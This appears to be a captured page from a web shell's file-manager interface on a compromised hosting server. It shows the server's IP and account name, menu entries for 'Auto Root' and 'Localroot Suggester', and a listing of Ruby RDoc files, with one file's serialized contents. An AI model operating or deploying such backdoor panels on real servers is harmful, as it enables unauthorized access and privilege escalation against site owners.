Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
Struct /
Delete
Unzip
Name
Size
Permission
Date
Action
%3d%3d-i.ri
968
B
-rw-r--r--
2023-07-26 17:38
%5b%5d%3d-i.ri
941
B
-rw-r--r--
2023-07-26 17:38
%5b%5d-i.ri
914
B
-rw-r--r--
2023-07-26 17:38
as_json-i.ri
372
B
-rw-r--r--
2023-07-26 17:38
cdesc-Struct.ri
1.7
KB
-rw-r--r--
2023-07-26 17:38
each-i.ri
833
B
-rw-r--r--
2023-07-26 17:38
each_pair-i.ri
956
B
-rw-r--r--
2023-07-26 17:38
eql%3f-i.ri
420
B
-rw-r--r--
2023-07-26 17:38
hash-i.ri
336
B
-rw-r--r--
2023-07-26 17:38
inspect-i.ri
397
B
-rw-r--r--
2023-07-26 17:38
json_create-c.ri
418
B
-rw-r--r--
2023-07-26 17:38
length-i.ri
574
B
-rw-r--r--
2023-07-26 17:38
members-i.ri
615
B
-rw-r--r--
2023-07-26 17:38
new-c.ri
2.43
KB
-rw-r--r--
2023-07-26 17:38
pretty_print-i.ri
234
B
-rw-r--r--
2023-07-26 17:38
pretty_print_cycle-i.ri
246
B
-rw-r--r--
2023-07-26 17:38
select-i.ri
793
B
-rw-r--r--
2023-07-26 17:38
size-i.ri
570
B
-rw-r--r--
2023-07-26 17:38
to_a-i.ri
597
B
-rw-r--r--
2023-07-26 17:38
to_h-i.ri
637
B
-rw-r--r--
2023-07-26 17:38
to_json-i.ri
403
B
-rw-r--r--
2023-07-26 17:38
to_s-i.ri
216
B
-rw-r--r--
2023-07-26 17:38
values-i.ri
601
B
-rw-r--r--
2023-07-26 17:38
values_at-i.ri
738
B
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::AnyMethod[iI"values_at:ETI"Struct#values_at;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [ I"1Returns an array containing the elements in ;TI"B+self+ corresponding to the given selector(s). The selectors ;TI".may be either integer indices or ranges. ;TI"#See also </code>.select<code>.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [ I"a = %w{ a b c d e f } ;TI"a.values_at(1, 3, 5) ;TI"a.values_at(1, 3, 5, 7) ;TI"!a.values_at(-1, -3, -5, -7) ;TI"a.values_at(1..3, 2...5);T:@format0: @fileI" struct.c;T:0@omit_headings_from_table_of_contents_below0I"2struct.values_at(selector,... ) -> an_array ;T0[ I"(*args);T@FI"Struct;TcRDoc::NormalClass0